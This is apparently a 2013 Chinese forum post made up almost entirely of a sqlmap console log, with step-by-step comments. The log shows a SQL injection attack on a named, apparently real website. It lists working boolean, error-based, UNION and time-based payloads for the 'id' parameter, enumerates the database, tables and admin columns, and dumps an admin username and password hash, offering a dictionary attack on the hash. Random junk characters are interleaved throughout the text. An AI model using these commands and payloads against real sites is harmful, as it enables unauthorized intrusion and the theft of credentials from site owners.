D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
( \# ~6 h7 }8 n0 I) F' qms "Mysql" --current-user /* 注解:获取当前用户名称
) w) {! g7 G6 O! i* K# W8 H sqlmap/0.9 - automatic SQL injection and database takeover tool/ M+ A* M6 u* @) Q1 o+ F
http://sqlmap.sourceforge.net starting at: 16:53:54
J" K- M) q5 h5 m. N[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as( k+ M+ |/ E5 m1 s* I( G$ p9 L
session file1 { K2 j0 J9 o' p( X9 K
[16:53:54] [INFO] resuming injection data from session file
, \2 f) r* m4 R5 W( }[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
- `: Q% L; L! u& r `# ][16:53:54] [INFO] testing connection to the target url( M% r) X9 e5 V q! f: v
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ e4 E! V8 y/ O2 K9 Z$ Usts:
+ y3 U5 u! a {# w& Q+ @. L, s---+ Q0 G2 J2 b' b) c; p/ z [
Place: GET' e- H, q3 M7 e. e4 F w* Y
Parameter: id
6 P" o/ ~+ ?5 C: f6 I Type: boolean-based blind
: Z2 ?. m% f k% K1 s6 L: z Title: AND boolean-based blind - WHERE or HAVING clause
6 M/ z. t8 U, r# p2 i Payload: id=276 AND 799=799
/ H0 h) C3 Q% [4 K1 g Type: error-based, ]: b" f* O: m3 l; O W6 a) Z
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause( v l9 E) y# Z5 E w
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
& I- |7 s' u4 w2 F7 Z4 P0 `8 _120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 q! d; W! V5 \6 m7 D1 W),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
& O, I0 ^* d, v9 A Type: UNION query* g- M0 `' | L# n. G5 }) w
Title: MySQL UNION query (NULL) - 1 to 10 columns
w- T8 _& I) s& x+ S Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
3 |3 Q6 @0 B8 a" Y4 `(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ r+ B- f4 A7 x* @2 kCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
5 B. N5 J4 |8 @8 c a( Q Type: AND/OR time-based blind
4 _4 G/ V# e: u( Q7 ? Title: MySQL > 5.0.11 AND time-based blind
1 ~2 a' k% F) E4 j6 c* @ Payload: id=276 AND SLEEP(5)
# D; K7 I* P8 ^7 \. P8 ?---
& Q* w( \) T7 n* {[16:53:55] [INFO] the back-end DBMS is MySQL: _9 i% x- S$ F% w- _6 ?% G3 `
web server operating system: Windows( @5 k4 f+ L6 `" t$ q! ~
web application technology: Apache 2.2.11, PHP 5.3.0
! W* D- _4 z w2 W7 Kback-end DBMS: MySQL 5.0 ?" m' ` B0 E. o
[16:53:55] [INFO] fetching current user# m: K# I0 C9 i( I; y
current user: 'root@localhost'
* s5 _9 u& E. s, b0 o$ X0 r[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
* u" w8 ]8 ?, W7 stput\www.wepost.com.hk' shutting down at: 16:53:58
, c& p, n" Y# T0 }; R. l$ t1 Q# }' X2 p$ }
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 b8 h9 L5 u/ ^0 Pms "Mysql" --current-db /*当前数据库
$ X3 k+ |5 P3 I: R. D8 d4 k sqlmap/0.9 - automatic SQL injection and database takeover tool
8 Z7 X: n* B' M4 H/ B" p% {% s http://sqlmap.sourceforge.net starting at: 16:54:16
" J2 E3 l. Q$ R+ u[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
. N% E$ k ?: D, d% J session file9 H! v$ T! [- h3 M
[16:54:16] [INFO] resuming injection data from session file" a6 u0 ^. n6 }1 z$ Q5 r, n* {
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
1 x/ u2 B; k, [1 y3 P' f {' t[16:54:16] [INFO] testing connection to the target url
6 A6 m- C" @ X9 H F% Csqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ I+ @ Y+ F1 C0 h# G* Lsts:; ~7 b, H& W0 Q" `* j) y% i4 D
---
% N& f" v9 G" g; G- aPlace: GET) N+ W. ?( {& {, }) B/ B% l) [
Parameter: id G8 a/ X' T* i
Type: boolean-based blind) s% R# \( A; O, r; \0 ]- S) [; |
Title: AND boolean-based blind - WHERE or HAVING clause' z( l3 I0 n/ a4 q7 e
Payload: id=276 AND 799=799
; g) k' [% y, I2 ~- H" U Type: error-based
0 l1 h* f' X" J8 q5 ^6 Y K$ k Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ J2 Q% `6 A+ t- ~* l Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
1 o( t- v7 f! b1 @& ]7 h' Q120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! M2 ~, i% i6 ^& }- G; \),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! B6 Q( r( d1 h$ R. d; S+ p
Type: UNION query6 {5 P3 {6 f1 E0 m3 ^
Title: MySQL UNION query (NULL) - 1 to 10 columns
5 R& n8 ^% i0 G5 S& z$ { Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, _- i6 `& ^# K g. V: D
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 }+ ?; T/ P1 N
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
) t+ e; j. i$ j7 J Type: AND/OR time-based blind
+ K, l/ L8 L F Title: MySQL > 5.0.11 AND time-based blind. f& R3 T/ u8 f# W
Payload: id=276 AND SLEEP(5)
9 U+ `. z0 J# Y9 ]# @---% z- d6 _4 Y) \1 ?
[16:54:17] [INFO] the back-end DBMS is MySQL
( @. q6 H& z: E& C# K9 Y; Lweb server operating system: Windows
. P0 s% T7 t+ d" |# Jweb application technology: Apache 2.2.11, PHP 5.3.0( @5 {4 s5 _+ m2 @
back-end DBMS: MySQL 5.0# ?- l/ B* F/ x- e& F9 B
[16:54:17] [INFO] fetching current database
. c5 x" V/ d" y V8 Acurrent database: 'wepost'5 W2 L+ R9 V7 K
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
. z/ d. [, H1 a- O' u2 u5 w7 |; K) d- Xtput\www.wepost.com.hk' shutting down at: 16:54:183 b' Z+ c/ Q3 ]5 J' I
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' \( e! I5 G( }$ z3 @
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名% |8 I9 V( G7 e5 @1 y: Q6 [
sqlmap/0.9 - automatic SQL injection and database takeover tool
) t$ t6 P' H W http://sqlmap.sourceforge.net starting at: 16:55:25
! S' F$ t7 G- L) s9 E$ i2 l[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as+ I$ g- ]- c6 L# P+ G# U8 v
session file
, q" f5 `0 D) r1 j+ f# r7 |[16:55:25] [INFO] resuming injection data from session file
' s& o+ _" Z: T, r[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file5 l5 T9 C6 k3 ?" x, I
[16:55:25] [INFO] testing connection to the target url
% W' p* I$ F5 S( O) {sqlmap identified the following injection points with a total of 0 HTTP(s) reque! a' u& k& N: ?
sts:, ~2 \& F# l- _* {$ C
---+ [ ^( C/ u0 ?2 f% G: [5 d; j
Place: GET* W, E9 @: v' h! ~
Parameter: id
; }* \5 `& v8 L, Q: c Type: boolean-based blind9 @* d, F8 O, S
Title: AND boolean-based blind - WHERE or HAVING clause
2 l5 v; ?0 O( A. G* R) l& Z Payload: id=276 AND 799=799
5 t( d2 k& T8 Y% \$ j3 N: l% y) g Type: error-based
) u% @2 U2 U6 J% O) _8 U0 `3 G Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
6 x# J% ?# T9 ~$ K) x) D Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; U: X& w/ ~# w0 W) q1 U
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( l" F' ?2 e% `9 @$ [
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
_! n% A: p- }) t# N& m Type: UNION query: J! S+ ^% f8 U0 ?+ Y5 U
Title: MySQL UNION query (NULL) - 1 to 10 columns7 a, n2 `: u" ^8 ^4 J
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 K2 u/ N# U+ k6 `3 F(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. U! B% E! J9 U" @* Q/ B1 F" s
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#' F# A; v7 s, @, l1 e+ C
Type: AND/OR time-based blind
+ n5 }; X q5 x* p Title: MySQL > 5.0.11 AND time-based blind2 F' [* ]1 D9 |0 A! A' r1 v
Payload: id=276 AND SLEEP(5)
9 ? T: V3 ~0 d7 R---
. x! R$ Q. m- z1 g8 g6 h- X2 J+ q[16:55:26] [INFO] the back-end DBMS is MySQL# F3 G9 O9 L) Q0 O
web server operating system: Windows
) A0 k3 W% J7 V) x* E3 w0 Z% B+ Kweb application technology: Apache 2.2.11, PHP 5.3.0
6 a4 R" T2 b- Q! G: H" jback-end DBMS: MySQL 5.0
: c' u8 e( S2 u! v- u! O7 Z2 @. u8 s[16:55:26] [INFO] fetching tables for database 'wepost'2 @. o- j' O3 I9 A
[16:55:27] [INFO] the SQL query used returns 6 entries' K2 s! E o* \; r0 N6 b
Database: wepost
1 o @# q5 A( Q3 [$ C[6 tables]1 ?4 q6 T1 T7 V# i0 J& }
+-------------+
' x! |# m) n2 i7 a& c/ m| admin |: e' a- G' O3 r7 ]5 o: P+ ]
| article |; \: O5 p6 r0 ?& A2 |
| contributor |
- C+ n% [1 t/ F1 r| idea |
3 {5 K* b/ \- Z1 R: M| image |% L+ t- l/ x/ e2 [
| issue |4 H" j& r3 q$ a f0 W! e+ W
+-------------+
& u$ v* I$ n% I7 {4 ?) D9 Y[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
1 W9 j7 i$ w8 _: u" Htput\www.wepost.com.hk' shutting down at: 16:55:33 {2 N# h! G+ D. ?( N, S
4 g" f2 q. N( C4 {# k) ?0 AD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! K% K" ~0 P, ~( Y/ ?2 W
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
8 D }) X) W u! f6 t sqlmap/0.9 - automatic SQL injection and database takeover tool
9 X: @5 R0 N+ H: B http://sqlmap.sourceforge.net starting at: 16:56:063 P/ y! \$ X, M" `1 X8 R
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
& ^% j1 |/ d, w. {8 _) msts:
$ @0 U* c( t' S9 }! G---# A- N9 f8 Z; Q; j. F# F3 c
Place: GET3 G5 U9 F& W, w0 Q0 h
Parameter: id
! Q! M! ]) m6 F& h Type: boolean-based blind% ~1 S! m; v- ^+ o/ o/ D5 c
Title: AND boolean-based blind - WHERE or HAVING clause
( ^+ j+ M" p. r; U1 U Payload: id=276 AND 799=799; c3 w, r2 n1 F; f' u$ u5 s
Type: error-based
$ L! [, F# p) n/ x/ Q8 h+ ~ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause9 F8 t" o0 }* Q& a, X8 z
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 x: x; ^& ~/ `! K& A120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58& g0 J9 ]6 P4 j% O( b, ^1 [
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
7 L1 j! e V5 r' n& Q8 W7 x Type: UNION query% n8 p( M5 Y4 G0 l* t R) H; R
Title: MySQL UNION query (NULL) - 1 to 10 columns! s* q5 z" d0 X1 \; j; s% G7 Q! X
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* o) b+ J- u5 u8 f& H, ?
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 Z- Y; ]- d' l6 ]' s
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#* A& B/ ]4 G5 k- z2 d
Type: AND/OR time-based blind: D3 F2 X$ |: l X/ N9 f3 T" V
Title: MySQL > 5.0.11 AND time-based blind
2 }! S# ?! p6 B) Y$ ]8 V) U Payload: id=276 AND SLEEP(5)
; J! L9 R. h4 E5 [) I* t---) O* E9 z5 ~+ s% g# s1 k
web server operating system: Windows- F" ^+ P2 Y. X; H+ o
web application technology: Apache 2.2.11, PHP 5.3.0
; u2 p9 X r9 x2 e3 pback-end DBMS: MySQL 5.0% c& X( W) P8 L- [( R0 Q; Z
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
# O) O/ r' C( ~) Pssion': wepost, wepost
9 b" O7 A' j3 Y% p- r& aDatabase: wepost1 P3 M3 s$ j9 ?; ~' ?$ q2 c
Table: admin
& L8 E! i6 |4 f: R; Q" @. r[4 columns]
5 U, G; y, }6 K) W& x5 d+----------+-------------+
3 n- g( y3 ^( c7 V# k/ I: d| Column | Type |$ T( e7 b& U4 }) @! [0 Q; N
+----------+-------------+
! k4 y! E) y9 m- [| id | int(11) |2 W0 \" s5 P: x) l
| password | varchar(32) |
" _, T7 p8 a1 C) f. _2 p! x| type | varchar(10) |/ L2 Q( g9 L B8 Z8 ]
| userid | varchar(20) |) M* u% ~4 K8 y+ |% L
+----------+-------------+
/ Z M1 m2 Y, j1 v% \- q shutting down at: 16:56:19
3 z; l. Q( [" Q8 u+ Y; p% i+ I
5 { \) K& H( |9 CD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* d1 F2 |% m8 q$ @/ ]$ }/ }ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容; E* A# g6 C8 e
sqlmap/0.9 - automatic SQL injection and database takeover tool6 d7 x! J9 k; j5 r) L' [7 J
http://sqlmap.sourceforge.net starting at: 16:57:142 s: f$ s. R( w/ a
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 k+ L0 @8 G* p" A# J; w9 Tsts:! K$ Z2 X2 t! ~. `1 u. E
---
% M! g! H' W; CPlace: GET
7 f" k6 g7 V+ i2 n9 |: `" V4 N! }Parameter: id
4 @+ Z" B4 U! o: \9 K; w Type: boolean-based blind- {9 ~% H7 h, G! T- C
Title: AND boolean-based blind - WHERE or HAVING clause
) F1 @% N) l3 B F4 N( @; @ Payload: id=276 AND 799=799
0 t* r, d! |. n" V/ D Type: error-based2 ?8 L V* r6 M
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
% ?, [/ o" Q' B Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 l+ d/ K' U/ V7 q: ]' G* C* d120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58- g e7 g J* Z8 _# @% @
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- I" {2 m8 B% X" C# B7 y) i6 P Type: UNION query
- G6 @9 o, s4 g3 r, R6 V Title: MySQL UNION query (NULL) - 1 to 10 columns" ~4 y# T' g( n6 h5 S
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR. z2 x6 P3 c8 x* G& M2 _& E* O+ m
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ q5 d! T7 n* U% {- r7 S
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% V; H4 f/ D8 v5 l2 w1 h
Type: AND/OR time-based blind
( W4 D" |2 O" Q Title: MySQL > 5.0.11 AND time-based blind* N! @, L9 x; e1 H4 [- c
Payload: id=276 AND SLEEP(5)
( ]% ?% {- N! T% R; w: _2 y# q5 H---. h' L+ E% |2 v) e* ~8 c- ?
web server operating system: Windows% ?& }) k q" P+ u" n
web application technology: Apache 2.2.11, PHP 5.3.0
1 A l/ R; Y; Q9 P% I' Q8 ]back-end DBMS: MySQL 5.00 x: B0 T) b3 t0 }: V3 t" E F
recognized possible password hash values. do you want to use dictionary attack o0 e; c2 c3 H- P( i
n retrieved table items? [Y/n/q] y
" E+ x3 F1 j5 O7 ewhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]0 t* N5 _5 r4 j! H$ Y
do you want to use common password suffixes? (slow!) [y/N] y
# g9 f' Z* M+ D" E# ]' ^9 m" {. FDatabase: wepost$ W$ X5 t& b% ~6 F! y
Table: admin* d" |2 H# N3 I9 v- Q. C
[1 entry]
h& @! i% U; s: S2 W) m+----------------------------------+------------+- L& G' a8 N i
| password | userid |6 Z/ C, n% z3 X- Q' N8 j/ s
+----------------------------------+------------+
) U) B* B, \- ^, v* x/ L& Q# `| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
" i$ o: e$ O3 j* h) n+----------------------------------+------------+2 f5 r; y: ^- ~
shutting down at: 16:58:14. A( N6 J9 m: d9 `
( p% ^! U! z4 ]" e& d
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对